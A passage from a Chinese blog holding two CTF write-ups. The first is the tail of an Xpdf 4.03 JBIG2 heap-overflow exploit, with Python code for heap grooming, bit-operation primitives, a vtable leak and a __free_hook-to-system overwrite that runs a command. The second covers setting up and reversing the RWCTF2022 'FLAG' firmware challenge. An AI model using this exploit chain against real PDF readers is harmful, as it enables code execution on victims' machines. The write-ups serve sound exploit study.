承接上文，接下来我们试着分配一个全新的 pageBitmap 结构，并让其 backing store 占据 size=16 的 Glist 空洞：

代码中的 GLIST_DATA_SIZE = 0x200，表示 size=64 时 global glist data 占据的字节数。

page0 = [
    # Make sure page bitmap buffer uses the second-last globalSegments data buffer so
    # that it lies just before syms, at a fixed offset.
    # GLIST_DATA_SIZE // 4，表示占据 size=16 时的 glist 堆空洞
    PageInfo(101, w=8 * (GLIST_DATA_SIZE // 4), h=1),
]

此时堆布局如下：

// low address --------------------------------------------
/* 
    一些其他的堆块分配，包括 
    1. size=8 的 global GList backing store
    2. DummyAlloc
    3. SymbolDict0、1、2
    4. ...
*/
SymbolDict3-8;

// 注意这里！
pageBitmap backing buffer // size=16 的 global GList backing store 堆空洞
    
SymbolDict9-16;

size=32 的 global GList backing store 堆空洞
    
SymbolDict17-32;

size=64 的 global GList backing store; // 最终的 GList data 堆位置，这里可不是堆空洞

// 注意这里！
pageBitmap JBIG2Bitmap; 结构体 
    
// high address -------------------------------------------

这里简单说一下 pageBitmap 结构本身的堆块分配(JBIG2Bitmap)，由于其 size 0x20 在堆链上找不到可分配的堆块，因此将仍然从 top chunk 中分配，故其地址位于 size=64 的 Glist 位置的高地址处，满足堆风水要求。

接下来需要在解析 TextRegion 时继续占用 size=32 的 Glist 堆空洞。因此 TextRegion 中创建的用户内存大小必须是 syms_size = GLIST_DATA_SIZE // 2，正好对应到 size=32 的 Glist 堆空洞大小。

但在做进一步的利用之前，我们需要绕过一个比较有趣的 sanity check：

// sanity check: if the w/h/x/y values are way out of range, it likely
// indicates a damaged JBIG2 stream
if (w / 10 > pageW || h / 10 > pageH ||
    x / 10 > pageW || y / 10 > pageH) {
    error(errSyntaxError, getPos(),
          "Bad size or position in JBIG2 text region segment");
    done = gTrue;
    return;
}

xpdf-4.03/xpdf/JBIG2Stream.cc 中多次出现上面的这种 sanity check，判断当前正在处理的 w\h\x\y 是否越过了当前的 pageW 和 pageH（两个 JBIG2Stream 类的成员变量，用于表示当前 page 的宽度和高度），如果越界则说明当前解析过程可能存在问题，那么则立即停止解析当前 segment。

看上去好像这个 sanity check 没啥问题…

但实际上，我们回过头看看 readPageInfoSeg 函数的代码：

void JBIG2Stream::readPageInfoSeg(Guint length)
{
    Guint xRes, yRes, flags, striping;
    // 从不受信任的流中直接读入 pageW 和 pageH
    if (!readULong(&pageW) || !readULong(&pageH) ||
        !readULong(&xRes) || !readULong(&yRes) ||
        !readUByte(&flags) || !readUWord(&striping))
    {
        goto eofError;
    }
    // 如果 pageW 和 pageH 过大
    if (pageW == 0 || pageH == 0 || pageW > INT_MAX / pageW)
    {
        // 则直接退出 pageInfoSeg 的解析
        error(errSyntaxError, getPos(), "Bad page size in JBIG2 stream");
        return;
    }
    [...]
}

我们可以非常容易的发现，即便 readPageInfoSeg 函数中检测到了 pageW 和 pageH 的异常，但也只是简单的退出掉当前 seg 的解析，保留了畸形 pageW 和 pageH 的值在 JBIG2Stream 类成员中。

这样，我们可以尝试插入一个超大 pageW 和 pageH 的 PageInfoSeg，从而污染这两个字段为超大值，bypass 后续所有新增加的 sanity check：

page0 = [
    # Make sure page bitmap buffer uses the second-last globalSegments data buffer so
    # that it lies just before syms, at a fixed offset.
    PageInfo(101, w=8 * (GLIST_DATA_SIZE // 4), h=1),
    # Change pageH and pageW to a large value to bypass a (seriously funny) sanity
    # check introduced in Xpdf 4.03; Xpdf would report an error without allocating
    # a new pageBitmap, but won't stop parsing the JBIG2 stream, which is exactly what
    # we want.
    PageInfo(101, w=1919114514, h=1919114514),
]

bypass 掉这个 sanity check 后，接下来就可以尝试创建 TextRegionSeg 来进行堆溢出了。承接上面所说的，这里所创建的 TextRegionSeg 需要满足几种要求：

其内部创建的 syms 大小必须是 syms_size（这个值上面已经说明了）
向堆块写入的数据大小为 size_to_overflow 个字节，即实际写 size_to_overflow // 8 个指针

因此接下来在 main stream 中，需要合理组合 TextRegion 所引用的 Symbol Dict 大小：

# Trigger the out-of-bound write.
TextRegion(
    102,
    w=1,
    h=1,
    x=0,
    y=0,
    # size_to_overflow // 8 个指针
    ref_segs=[1] 
    # 0x10000 + (syms_size - size_to_overflow) // 8 个指针
    + [2] * (0x10000 + (syms_size - size_to_overflow) // 8)
    # 共 0xffff0000 个指针
    + [0] * 0xFFFF, 
),

上面代码的组合中，

$$size_to_overflow / 8 + {0x10000 + (syms_size - size_to_overflow) / 8} + 0xffff0000 = 0x100000000 + syms_size/8$$，即刚好分配 syms_size 个字节。

又因为先 ref 的那个 Symbol Dict 的大小为 size_to_overflow // 8 个指针。因此当 readTextRegion 解析第一个 ref 的 Symbol Dict 时，刚好向 syms 堆块中写入 size_to_overflow 个字节，直接溢出至 pageBitmap JBIG2Bitmap 结构体头部位置，如此便能达到溢出的目的。

这里说明一下 size_to_overflow 是怎么得出的，先上堆布局：

// low address --------------------------------------------
/* 
    一些其他的堆块分配，包括 
    1. size=8 的 global GList backing store
    2. DummyAlloc
    3. SymbolDict0、1、2
    4. ...
*/
SymbolDict3-8;
pageBitmap backing buffer // size=16 的 global GList backing store 堆空洞
SymbolDict9-16;

// 从此处开始写入数据
syms // syms 的 size 为 syms_size
SymbolDict17-32; // 16 个 SymbolDict 的 size，一个 SymbolDict 的 size 为 0x40 字节
size=64 的 global GList backing store; // 此时的 Glist size 为 GLIST_DATA_SIZE
pageBitmap JBIG2Bitmap 结构体  // 这里还需要覆写 vtble + segNum + w + h + line，共24字节
    
// high address -------------------------------------------

根据堆布局可得知：

size_to_overflow = (
    ptmalloc_chunk_size(syms_size)
    # 40: sizeof(JBIG2SymbolDict); there are (glist_capacity // 2) irrelevant JBIG2SymbolDict-s
    + ptmalloc_chunk_size(40) * (glist_capacity // 2)
    + ptmalloc_chunk_size(GLIST_DATA_SIZE)
    # Current page JBIG2Bitmap
    # vtbl(8)
    + 8
    # segNum(4), w(4), h(4), line(4)
    + 4 * 4
)

之后，将 readTextRegionSeg 中刚刚被释放掉的那个 syms_size 大小的堆块再次分配回来，防止在后续的利用中出现可能的崩溃。

1 2	# Take back the free-d syms, hold it to prevent potential crash. GenericRegion(103, imm=False, bitmap=Bitmap(8, syms_size)),

由于越界写入 pageBitmap JBIG2Bitmap 结构体头部位置的是指针值，可以越界读写的数据有限，因此我们需要根据这个有限的 pageBitmap 越界读写原语，来自己修改自己的 JBIG2Bitmap 结构体头，将其中的 w\h\line 修改的更大，扩展自己的读写范围。根据上面的堆布局，同样可以得出 page_bitmap_buf 至 pageBitmap JBIG2Bitmap 的距离：

page_bitmap_buf_to_class_offset = (
    ptmalloc_chunk_size(GLIST_DATA_SIZE // 4)
    + ptmalloc_chunk_size(40) * (glist_capacity // 4)
    + size_to_overflow
    - 4 * 4
    - 8
)

之后将其 w\h\line 分别更改为 $w=2^{27}$、$h=2^{24}$、$line=2^{24}$：

imm 为 true 表示即时渲染，即立即修改 pageBitmap 上的指定位置。

# Overwrite pageBitmap->w, h and line
GenericRegion(
    104,
    x=(page_bitmap_buf_to_class_offset + 12) * 8,
    y=0,
    comb_op=CombOp.Replace,
    # (x, y) -> mem[(y << 24) | (x >> 3)] >> (7 - (x & 7)), max 48-bit addressing
    bitmap=Bitmap(struct.pack(", 2 ** 27, 2 ** 24, 2 ** 24)),
    imm=True,
),

修改后的 pageBitmap 的二维空间构造：

+------------------> w=2^27 bit
|
|
|
|
|
|
V h=2^24 bit

最后创建带有 16 个 Bitmap 的 SymbolDict ，以备接下来的利用所使用：

# 16 "variables". Since we can only do bitwise operations relative to page bitmap
# with Refinement regions, we need these variables for peeking other absolute
# addresses, and also rebase the page bitmap in one segment command.
SymbolDict(105, [Bitmap(64, 1)] * 16)

这些 SymbolDict 将用于地址解引用原语中，具体在下面会详细介绍。

整体的堆风水布局大体如上所示。完成堆溢出后，pageBitmap 具备了大偏移读写的功能，因此接下来就要开始写原语利用了。

2. 位运算原语

还记得先前介绍的 GenericRefinementRegionSeg 么（不记得就翻到上面看看），接下来我们需要利用这个 seg 的特性来编写任意位的位运算器。

exploit 中实现的位运算器如下所示：

class BitSeg:
    _seq = itertools.count(10000)

    def __init__(self, seg_num):
        self.seg_num = seg_num
        self.__consumed = False

    def consume(self):
        assert not self.__consumed
        self.__consumed = True
        return self.seg_num

    @classmethod
    def from_page(cls, offset):
        x, y = offset % 2 ** 27, offset // 2 ** 27
        idx = next(cls._seq)
        page0.append(ReadoutRefinement(idx, x=x, y=y, imm=False))
        return cls(idx)

class CombOp(enum.IntEnum):
    Or = 0
    And = 1
    Xor = 2
    Xnor = 3
    Replace = 4
    
def bitop(oa, ob, op: CombOp):
    b = BitSeg.from_page(ob)
    x, y = oa % 2 ** 27, oa // 2 ** 27
    page0.append(
        ReadoutRefinement(65536, x=x, y=y, imm=True, ref=b.consume(), comb_op=op)
    )

原语 bitop 的 oa、ob 两个参数的单位为 bit，op 有 5 种。

bitop 原语初始时将一维偏移量 oa、ob 分别映射至 bitmap 的二维偏移量 xy1、xy2，之后在解析 ob 对应的 RefinementRegionSeg 时，从 pageBitmap 中取出对应 xy2 的数据，并将其存入 segments 中。

一维偏移量向二维偏移量映射时，为什么使用的是 2^27 作为除数/模数呢？因为这是上面所修改后的 width 的大小。

接下来当 hso 解析 oa 对应的 RefinementRegionSeg 时，hso 会重新读入先前存入的 ob 对应的 RefinementRegion，并将其与 pageBitmap 特定 xy1 位置进行位运算，达到指定 pageBitmap 上任意两位之间进行位运算的目的。

这里需要注意的是，findSegment 查找算法的核心，是依次遍历 segments 列表的元素并比对 segNum 来进行查找。因此每次添加进 segment 的 RefinementRegion，其 segNum 一定不能与之前 append 进去的 segments 相同！

当位运算原语 binop 可用后，接下来就可以构建其他原语：

bitwise_mov = lambda a, b: bitop(a, b, CombOp.Replace)
bitwise_xor = lambda a, b: bitop(a, b, CombOp.Xor)
bitwise_and = lambda a, b: bitop(a, b, CombOp.And)
bitwise_or = lambda a, b: bitop(a, b, CombOp.Or)


def op_q_q(oa, ob, op: CombOp):
    for i in range(64):
        bitop(oa * 8 + i, ob * 8 + i, op)


# Offsets are in bytes.
mov_q_q = lambda a, b: op_q_q(a, b, CombOp.Replace)
xor_q_q = lambda a, b: op_q_q(a, b, CombOp.Xor)
and_q_q = lambda a, b: op_q_q(a, b, CombOp.And)
or_q_q = lambda a, b: op_q_q(a, b, CombOp.Or)

这里的 op_q_q 原语，其 oa、ob 参数的单位为字节（注意和 binop 的单位并不相同）。

op_q_q 原语的目的，是对给定 oa 和 ob 的相对一维偏移字节所对应的两个位置，做一次8字节位运算。

举个例子，原语 and_q_q(0, 8)，执行的操作为：

将偏移量为 0字节 的位置上的八字节(即 0-7 这8个字节)，与 偏移量为 8字节 的位置上的八字节（即 8-15 这8字节），进行一次一一对应的 and 运算。
将运算结果放置在偏移量为 0字节 的位置上的八字节(即 0-7 这8个字节)上。

这个原语其实很好理解，只是用文字记录下来感觉不太好记录，也可能是我文笔不太好。

之后便是通过位运算来构建8字节全加器，可以先看看这篇文章再看看代码：

# Don't worry, Libra won't hu^W^W^W Xpdf allocates 1 more byte
adder_buf_offset = GLIST_DATA_SIZE // 4 * 8 # 1024

def add_q_q(oa, ob):
    oa, ob = oa * 8, ob * 8
    ab_xor, ab_and, carry, ab_xor_c_and, zero = range(
        adder_buf_offset, adder_buf_offset + 5
    )
    # 初始时，最低位全加器的进位标志为0
    bitwise_mov(carry, zero)
    # 8字节 = 64 位，因此这里的 range 为 64
    for i in range(64):
        # 这里是每个 **位** 的全加器，一个全加器由两个半加器构成
        a_bit_offset = oa + i // 8 * 8 + (7 - i % 8)
        b_bit_offset = ob + i // 8 * 8 + (7 - i % 8)
        # This is a naive full-adder. Applying TIS-100 skill could cut 3~4 ops maybe.
        # 首先是第一个半加器
        bitwise_mov(ab_xor, a_bit_offset)
        bitwise_xor(ab_xor, b_bit_offset)
        bitwise_mov(ab_and, a_bit_offset)
        bitwise_and(ab_and, b_bit_offset)
        # 其次是第二个半加器
        bitwise_mov(a_bit_offset, ab_xor)
        bitwise_xor(a_bit_offset, carry)  # output (S)
        bitwise_mov(ab_xor_c_and, ab_xor)
        bitwise_and(ab_xor_c_and, carry)
        # 设置进位标志
        bitwise_mov(carry, ab_and)
        bitwise_or(carry, ab_xor_c_and)

其全加器结构如下所示：

3. 立即数运算原语

除了上面所介绍的位运算原语以外，还有加载外部立即数计算的原语。

def op_q_imm(offset, imm, op):
    offset *= 8
    x, y = offset % 2 ** 27, offset // 2 ** 27
    page0.append(
        GenericRegion(
            233, x=x, y=y, comb_op=op, bitmap=Bitmap(struct.pack(", imm)), imm=True
        )
    )


mov_q_imm = lambda o, imm: op_q_imm(o, imm, CombOp.Replace)
xor_q_imm = lambda o, imm: op_q_imm(o, imm, CombOp.Xor)
and_q_imm = lambda o, imm: op_q_imm(o, imm, CombOp.And)
or_q_imm = lambda o, imm: op_q_imm(o, imm, CombOp.Or)

readGenericRegionSeg 方法可从外部 JBIG2Stream 流中读入一个 bitmap 并将其与 pageBitmap 上的特定位置进行运算，因此 GenericRegionSeg 可用于此处的立即数运算原语。

4. 地址解引用原语

当我们有了某个指针的绝对地址后，我们如何将这个指针从该绝对地址中读取出来呢？这就需要用到地址解引用操作。这里，exploit 准备了两个原语：

rebase_variable_q：将 pageBitmap 中一维偏移为 addr_page_offset 处的 8 字节数据，复制进堆风水中最后一步所创建的带有 16 个 Bitmap 的 SymbolDict 中，第 idx 个 JBIG2Bitmap 的 data 字段上：
注意，是直接将值覆盖在 JBIG2Bitmap 的 data 字段上，而不是写进 data 指针所指向的内存上。
1
2
3
4
5
def rebase_variable_q(idx, addr_page_offset):
mov_q_q(
variable_bitmap_offset + idx * ptmalloc_chunk_size(0x20) + 0x18,
addr_page_offset,
)

load_variable：读取最后一个 Symbol Dict 中，第 idx 个 JBIG2Bitmap backing store 里的（即 data 指针解引用后的内存上）的第一个 8 字节数据，至 pageBitmap 中一维偏移为 to_page_offset 处的 8 字节内存位置。

def load_variable(to_page_offset, idx):
    to_page_offset *= 8
    x, y = to_page_offset % 2 ** 27, to_page_offset // 2 ** 27
    page0.append(
        TextRegion(
            233,
            x=x,
            y=y,
            w=64,
            h=1,
            imm=True,
            instances=[idx],
            ref_symbol_cnt=16,
            ref_segs=[105],
        )
    )

这两个原语一结合，就能达到地址解引用的目的。

5. 整体利用流程

各类原语已经都准备好了，接下来便是结合这些原语覆写 free_hook 为 libc_system 的地址。

首先，我们需要 leak 一个地址出来（这个地址自然不能是堆地址），通过查看堆布局：

// low address .....
...
SymbolDict3-8;
pageBitmap backing buffer // size=16 的 global GList backing store 堆空洞
SymbolDict9-16;
...
// high address .....

可以看到紧临着 pageBitmap 的便是 SymbolDict，因此我们可以尝试读取其虚表指针。

1
2
3

# vtbl of a JBIG2SymbolDict adajacent to page bitmap buffer
# 取出vtbl地址放到+0处
mov_q_q(0, ptmalloc_chunk_size(GLIST_DATA_SIZE // 4))

之后从外部读取一个相对偏移至 pageBitmap data + 8 的位置：

# 计算出-vtbl_offset + free_got_offset
mov_q_imm(
    8, (-PDFTOHTML_VTBL_JBIG2SYMBOLDICT_OFFSET + PDFTOHTML_FREE_GOT_OFFSET) % 2 ** 64
)

然后再简单做个加法，就能得到 free 条目在 GOT 表上的绝对地址，放到 +0 处：

1 2	# 计算vtbl地址+(-vtbl_offset + free_got_offset)得到free_got的地址，放到+0处 add_q_q(0, 8)

接下来，尝试对该 free.got 地址进行解引用，获取 free.libc 地址：

# 从+0处取出free_got的地址，放到第0个"变量"data 指针处
rebase_variable_q(0, 0)
# 取出存放在第0个"变量"里的值（此时该值为 libc.free 的绝对地址），放到+8处
load_variable(8, 0)  # address of libc.free at +8

在获取到 free.libc 地址后，读入一个相对偏移并做个加法，经过简单几步，我们便能得到 free_hook 和 libc_system 的绝对地址：

# 把LIBC_FREE_OFFSET这个立即数的值放到+0处
mov_q_imm(0, -LIBC_FREE_OFFSET % 2 ** 64)
# 计算free_got的地址+(-libc_free_offset)，得到libc基地址，放到+8处
add_q_q(8, 0)
# 复制+8处存放的libc基地址至+0处
mov_q_q(0, 8)
# 把LIBC_FREE_HOOK_OFFSET这个立即数放到+16处
mov_q_imm(16, LIBC_FREE_HOOK_OFFSET)
# 计算出libc基地址+LIBC_FREE_HOOK_OFFSET,即free_hook的绝对地址，放到+0处
add_q_q(0, 16)
# 取出system的偏移这个立即数，放到+16处
mov_q_imm(16, LIBC_SYSTEM_OFFSET)
# 计算出system的绝对地址，放到+8处
add_q_q(8, 16)

注意，此时 pageBitmap->data 上的数据为：

1	+0: free_hook_address +8: libc_system_address

接下来便是计算 pageBitmap->data + 8 的地址，即存放着这个 libc_system_address 值的内存地址：

# 取出pagebitmap的data指针，放到+24处
mov_q_q(24, page_bitmap_buf_to_data_ptr)
# 把立即数8放到+16处
mov_q_imm(16, 8)
# 将data指针加上8，并将结果放到+24处
add_q_q(24, 16)

计算出这个内存地址的用处是什么呢？继续向下看，注意重头戏快到了：

# 取出pagebitmap的data指针的值放到第0个变量的 data 字段
rebase_variable_q(0, page_bitmap_buf_to_data_ptr)
# 取出data指针+8的值，放到第1个变量的 data 字段
rebase_variable_q(1, 24)
# 取出第0个变量的值，放到data指针处, 这一步会修改 data 指针为 free_hook_address
load_variable(page_bitmap_buf_to_data_ptr, 0)
# 取出第1个变量的值（也就是 libc_system_address），放到+0处，也就是 free_hook 基地址上的那个指针值
# 这样就完成了改写 free hook 的操作
load_variable(0, 1)

这样，此时的 free hook 便被改写成了 libc_system 的地址，接下来便是尝试执行命令。

这里再 append 一个带有待执行命令的 bitmap：

1
2
3

page0.append(
    GenericRegion(233, x=64, y=0, comb_op=CombOp.And, bitmap=Bitmap(COMMAND_TO_RUN))
)

这样当 readGenericRegionSeg 函数结束时，新创建的 bitmap（即带有命令的 bitmap）将会被 free 掉，这样就可以触发 system(command)：

void JBIG2Stream::readGenericRegionSeg(Guint segNum, GBool imm,
                                       GBool lossless, Guint length)
{
    [...];
    // read the bitmap
    bitmap = readGenericBitmap(mmr, w, h, templ, tpgdOn, gFalse,
                               NULL, atx, aty, mmr ? length - 18 : 0);

    // combine the region bitmap into the page bitmap
    if (imm)
    {
        if (pageH == 0xffffffff && y + h > curPageH)
        {
            pageBitmap->expand(y + h, pageDefPixel);
        }
        pageBitmap->combine(bitmap, x, y, extCombOp);
        // 在这里触发 system
        delete bitmap;

        // store the region bitmap
    }
    [...]
}

但有两点需要注意：

imm 必须为 true，这样才能触发 delete 操作。
创建的 GenericRegionSeg，其二维偏移 xy 映射至一维偏移后的偏移量，不能小于 64（即 8 字节）
这是因为代码中会先执行 pageBitmap->combine 再执行 delete bitmap 操作。此时的 pageBitmap->data 为 free hook address，如果执行 combine 时修改了pageBitmap->data 最低的8个字节，那么 free 时就无法调用到 libc_system，因为保存在 free_hook 上面的 libc_system 地址被破坏了。

六、参考

RWCTF2022 Pwn 笔记2 - FLAG Writeup

2022-01-30T16:00:00.000Z

简介

这里是复盘 RWCTF2022 中 FLAG 题时所写下的一些笔记。

由于这题较为复杂，因此需要单独开一个博文来记录。

联合作者：sakura

一、FLAG 小叙

FreeRTOS+LwIP+ARM+GoAhead
I don't want another backdoor ctf. So I have to say: "There is a backdoor in challange"
The default account in attachment is admin:admin
nc 8.210.44.156 31337
attachment

Pwn, difficulty:normal
Hint: flag.bin has a backdoor/bugdoor and you're supposed to take over it. The flag is not embedded in the binary and will be made available to the appliance via network at runtime, see docker-compose.yml in attachment for details.

这一题是多个部件组成的一个二进制文件，其中

FreeRTOS：轻量级实时操作系统。
- 无内核，所有任务运行在实模式，可以执行特权指令
- 业务逻辑与内核代码一同编译成单个二进制文件，因此无 NX、PIE、ASLR 等。
- 无保护模式，因此执行 shellcode 后需要保证 OS 不崩溃。
LwIP：轻量级 TCP/IP 实现，适用于资源较少的轻量级嵌入式系统
ARM：ARM 32 little-endian 架构
GoAhead：一个嵌入式微型网页服务

题目给了一些附件，其中有用的主要有：

flag.py：docker 服务会在 每30s 向接口 http://localhost:5555/action/backdoor 发送一次 GET 请求，如果：
- 请求返回 {'status' : 'success'}
- 请求返回 HTTP 状态码为 200
则 flag.py 将会加载 flag 并且以 {"flag": flag} 的形式发送给该 backdoor。
很明显，我们需要 pwn 掉这个 binary，伪造一个 backdoor 服务、尝试接收传来的 flag 并输出给用户。
flag.bin：题目的二进制附件，这个暂且略过不表。

dockerfile：其中记录了 qemu 的启动参数：

qemu-system-arm \
  -m 64 \
  -nographic \
  -machine vexpress-a9 \
  -net user,hostfwd=tcp::5555-:80 \
  -net nic \
  -kernel /mnt/flag.bin

把题目启动之后，访问 localhost:5555，即可访问到题目 Web 服务的登录界面：

接下来输入账号admin、密码admin，进入到一个普通的小游戏页面，看上去没什么特别的，估计不是重点；直接访问 backdoor 接口，返回 404 界面。

如果想退出 QEMU, 则在启动 qemu 的终端里，先键入 ctrl + a，之后抬起这两个键，并接着按下 x 即可退出。

二、FLAG 环境搭建

下载并安装 IDA BinDiff 插件 - download link (ladder needed)
网上的教程里描述了安装该插件时需要指定 IDA 安装路径，但是本人实测安装时并没有要求指定 IDA 安装路径，但是 IDA 仍然可以识别并加载 BinDiff 插件。
BinDiff 将用于恢复 GoAhead 符号。
下载多架构 gdb:
1
sudo apt-get install gdb-multiarch
调试 kernel 的方式：
- 在 qemu 启动参数后加上 -gdb tcp::1234
- 然后使用 gdb-multiarch 执行 target remote localhost:1234 连接 qemu

三、确定内核加载基地址

如果我们直接把题目内核拖入 IDA 中，IDA 是无法识别的，因此需要确定并指定加载基地址。

基地址的确定本身就是一件比较难的事情，需要逻辑推理+大胆猜测。

我们先将 flag.bin 拖入 32 位 IDA（注意是32位），指定 Processor Type 为 ARM Little-endian：

之后对前几条指令执行 make code 操作（快捷键 p 或者 c），会生成一系列的内存地址加载指令：

注意到这几条访问内存地址为 0x6001XXXX 的指令，结合 gdb 调试断下的指令位置为 0x60010658：

因此我们可以大胆推断基地址应该为 0x60010000。

加载基地址确定好后，就可以为 IDA 重设基地址。

之后 IDA 便可以分析出部分代码等：

接下来还需要全选IDA中的代码+数据，并右键点击 Analyze 进行完整分析，等待它分析完成。

但是这里的分析不会完全的进行分析，因此还需要使用这个 firmware-fix 脚本来进行二次分析，执行自动创建函数体、字符串等操作。（确定了代码区末尾地址为 0x6006F544）

注意：该脚本无法区分出不同的段，因此在这一题中效果一般般… 会把一些明显是数据的东西恢复成函数。
感兴趣可以看看源码，不长。

执行完成上面的步骤后，仍然有相当一部分的字符串无法使用交叉引用，暂且先这样。

需要注意的是，IDA 的反编译引擎 Hex-Ray 需要参考 segment 的信息来生成 C 代码（例如RWX权限情况），因此我们最好恢复一下。最简单的方式就是把当前这个 ROM 段权限直接改成 RWX，不过本人根据恢复结果创建了一个 text 段。

四、恢复符号

a. GoAhead 符号

现在我们可以尝试恢复 GoAhead 符号。首先通过字符串搜索 + 交叉引用找到 GoAhead 相关的函数：

注意：如果该函数的反汇编无法直接 F5, 则找到该地址的上一个函数的末尾地址，并右键点击 Create Function ，之后再反编译即可。

该函数最后一行有一个字符串说明了 GoAHead 的版本号，为 5.1.5，因此我们可以立即编译一个 5.1.5 的 GoAHead 二进制文件：

这里可以指定使用 arm32 编译器来生成 libgo.so，这样 bindiff 效果会更好。

git clone https://github.com/embedthis/goahead
cd goahead
git checkout v5.1.5
make
file build/linux-x64-default/bin/libgo.so # 目标文件

将该 libgo.so 目标文件拖到 IDA 里，生成 libgo.idb 数据库文件。之后在开启 flag.bin 的 IDA 中，使用 BinDiff 插件与 libgo.idb 进行比对。

通过简单的对比，发现 Similarity 大于 0.80 的函数基本上和 libgo.so 的反编译结果能对上，因此我们可以尝试恢复这部分函数的符号上去：

注意，BinDiff 可以通过比较基本块关联、反编译代码关联等来进行比较，因此即便用于比较的两个文件是不同架构的，该插件仍然可以比较并输出结果。

下图是我恢复 similarity > 0.40 的操作，注意最好不要像我这么冒险，恢复相似度非常低的函数。

接下来需要恢复 GoAHead 结构体定义：在 libgo.so 的 IDA 界面中，点击 File -> Produce file -> Create C Header File 将一些结构体定义输出至新的头文件中；之后在 flag.bin IDA 界面中，点击 File -> Load file -> Parse C header file 导入该头文件。

b. lwIP 符号

题目在启动时便给了版本号：

1	lwIP-2.1.3 initialized!

首先下拉代码并编译：

git clone https://git.savannah.nongnu.org/git/lwip.git
cd lwip
git checkout STABLE-2_1_3_RELEASE
cmake -B build .
cd build
# 安装 ARM 编译器
sudo apt-get install gcc-arm-linux-gnueabihf
CC=arm-linux-gnueabihf-gcc make lwipcore lwipallapps

make 时遇到各种头文件缺失问题，首先 down 一个 RTOS 源码下来:

1
2
3

# 在 lwIP 的同级目录下
git clone https://github.com/FreeRTOS/FreeRTOS
git submodule update --init --recursive

之后给 lwIP 打上这个 patch:

diff --git a/CMakeLists.txt b/CMakeLists.txt
index f05c0f61..a26752f1 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -14,6 +14,9 @@ set(CPACK_PACKAGE_VERSION_PATCH "${LWIP_VERSION_REVISION}")
 set(CPACK_SOURCE_IGNORE_FILES "/build/;${CPACK_SOURCE_IGNORE_FILES};.git")
 set(CPACK_SOURCE_PACKAGE_FILE_NAME "lwip-${LWIP_VERSION_MAJOR}.${LWIP_VERSION_MINOR}.${LWIP_VERSION_REVISION}")
 include(CPack)
+include_directories ("src/include")
+include_directories ("test/unit")
+include_directories ("../FreeRTOS/FreeRTOS/Demo/CORTEX_A9_Zynq_ZC702/RTOSDemo/src/lwIP_Demo/lwIP_port/include")
 
 # Target for package generation
 add_custom_target(dist COMMAND ${CMAKE_MAKE_PROGRAM} package_source)
diff --git a/src/include/lwip/arch.h b/src/include/lwip/arch.h
index 58dae33a..6159082f 100644
--- a/src/include/lwip/arch.h
+++ b/src/include/lwip/arch.h
@@ -126,8 +126,8 @@ typedef uint8_t   u8_t;
 typedef int8_t    s8_t;
 typedef uint16_t  u16_t;
 typedef int16_t   s16_t;
-typedef uint32_t  u32_t;
-typedef int32_t   s32_t;
+// typedef uint32_t  u32_t;
+// typedef int32_t   s32_t;
 #if LWIP_HAVE_INT64
 typedef uint64_t  u64_t;
 typedef int64_t   s64_t;
diff --git a/src/include/lwip/sockets.h b/src/include/lwip/sockets.h
index d70d36c4..ac17f302 100644
--- a/src/include/lwip/sockets.h
+++ b/src/include/lwip/sockets.h
@@ -108,7 +108,7 @@ struct sockaddr_storage {
 /* If your port already typedef's socklen_t, define SOCKLEN_T_DEFINED
    to prevent this code from redefining it. */
 #if !defined(socklen_t) && !defined(SOCKLEN_T_DEFINED)
-typedef u32_t socklen_t;
+// typedef u32_t socklen_t;
 #endif
 
 #if !defined IOV_MAX
@@ -519,10 +519,10 @@ struct pollfd
 #endif
 
 #if LWIP_TIMEVAL_PRIVATE
-struct timeval {
-  long    tv_sec;         /* seconds */
-  long    tv_usec;        /* and microseconds */
-};
+// struct timeval {
+//   long    tv_sec;         /* seconds */
+//   long    tv_usec;        /* and microseconds */
+// };
 #endif /* LWIP_TIMEVAL_PRIVATE */
 
 #define lwip_socket_init() /* Compatibility define, no init needed. */

之后重新执行上述的编译操作即可。

但是这样编译出来的竟然是静态链接库，没法拖到 IDA 里分析，因此还需要修改一下 CMakeList 中的东西：

diff --git a/src/Filelists.cmake b/src/Filelists.cmake
index 21d7b490..179f5716 100644
--- a/src/Filelists.cmake
+++ b/src/Filelists.cmake
@@ -268,12 +268,12 @@ else (DOXYGEN_FOUND)
 endif (DOXYGEN_FOUND)
 
 # lwIP libraries
-add_library(lwipcore EXCLUDE_FROM_ALL ${lwipnoapps_SRCS})
+add_library(lwipcore SHARED ${lwipnoapps_SRCS})
 target_compile_options(lwipcore PRIVATE ${LWIP_COMPILER_FLAGS})
 target_compile_definitions(lwipcore PRIVATE ${LWIP_DEFINITIONS}  ${LWIP_MBEDTLS_DEFINITIONS})
 target_include_directories(lwipcore PRIVATE ${LWIP_INCLUDE_DIRS} ${LWIP_MBEDTLS_INCLUDE_DIRS})
 
-add_library(lwipallapps EXCLUDE_FROM_ALL ${lwipallapps_SRCS})
+add_library(lwipallapps SHARED ${lwipallapps_SRCS})
 target_compile_options(lwipallapps PRIVATE ${LWIP_COMPILER_FLAGS})
 target_compile_definitions(lwipallapps PRIVATE ${LWIP_DEFINITIONS}  ${LWIP_MBEDTLS_DEFINITIONS})
 target_include_directories(lwipallapps PRIVATE ${LWIP_INCLUDE_DIRS} ${LWIP_MBEDTLS_INCLUDE_DIRS})

然后编译报错，提示 :

1	/usr/bin/ld: errno: TLS definition in /lib/x86_64-linux-gnu/libc.so.6 section .tbss mismatches non-TLS reference in CMakeFiles/lwipcore.dir/src/api/if_api.c.o

将某个头文件中的 extern errno 替换掉即可：

diff --git a/src/include/lwip/errno.h b/src/include/lwip/errno.h
index 48d6b539..acd7817f 100644
--- a/src/include/lwip/errno.h
+++ b/src/include/lwip/errno.h
@@ -174,7 +174,8 @@ extern "C" {
 #define  EMEDIUMTYPE    124  /* Wrong medium type */
 
 #ifndef errno
-extern int errno;
+// extern int errno;
+#include 
 #endif
 
 #else /* LWIP_PROVIDE_ERRNO */

成功编译出 .so 动态链接库。之后照着上面的步骤恢复符号即可。

后来才发现，这里恢复 lwIP 符号的操作并没有什么用处，纯当是踩坑记录了。

五、漏洞思路

接下来可以看看字符串表中有哪些有用的信息：

看上去都很有趣，但是都找不到交叉引用（恢复的还是不够好）。

不过可以通过全局搜索字符串的地址来找到引用的地方。

继续向上交叉引用，找到该函数，可以看到注册了一个 submit 动作，其事件处理例程就是上一个找到的函数。继续交叉引用发现除了注册了 submit 动作以外，还注册了 login 和 logout 动作，不过这两个动作看上去用处不大，暂且忽略不看。

